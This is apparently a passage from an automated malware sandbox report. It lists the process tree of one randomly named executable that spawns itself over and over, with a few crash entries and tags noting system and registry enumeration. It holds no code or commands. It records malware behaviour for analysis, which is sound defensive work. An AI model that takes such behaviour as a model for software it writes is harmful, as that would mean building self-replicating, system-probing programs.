        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:8196
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:6604
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:9472
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:9332
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:10180
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:5180
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:9988
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:7032
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:6496
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:6964
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:3132
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:10344
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:10996
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:10596
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:10968
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:11168
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:3872
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:4284
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:11868
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:3872
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:11952
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:12060
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:6260
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:11488
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:9204
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:8228
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:6716
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:12744
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:12436
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:13252
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:9212
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:10068
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:13100
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:13504
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:14260
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:796
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:1068
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:13796
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:5140
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:6820
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:10404
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:14464
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:15056
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:13548
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:15180
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:15324
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:15040
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:15160
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:15260
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:14376
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:15556
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:16256
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:15512
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:16172
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:4660
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:2968
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:344
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:15408
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:16876
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:16160
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:11568
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:16892
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:15544
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:17808
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:17204
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:16776
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:18344
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:5052
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:17540
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 17540 -s 28
        13⤵
        Program crash
        
        PID:3060
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:18948
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:10584
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:19068
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:14100
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:15608
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:16232
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:784
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:11468
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:8472
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:14100
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:19936
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:14852
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:20352
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:13444
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:1568
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:17084
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 17084 -s 28
        13⤵
        Program crash
        
        PID:20624
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:19916
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:20668
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:10004
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:20136
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:20704
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:21432
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:13976
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:20616
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:5044
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:7576
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:22172
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:18984
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:22884
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:932
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:23540
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:3296
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:12780
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:14924
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:13544
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:2208
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:23920
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:2540
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:15224
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:23736
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:13812
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:23892
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:24364
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:17160
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:24936
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:24640
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:19064
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:20788
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:25060
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:23056
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:22016
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:21964
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:24560
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:20448
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:24440
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:25188
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:19356
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:18676
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:25920
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:7164
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:25960
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:16600
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:3028
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:11920
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:21544
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:2204
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:25028
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:27540
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:26896
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:26764
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:15032
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:27012
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:26252
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:28084
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
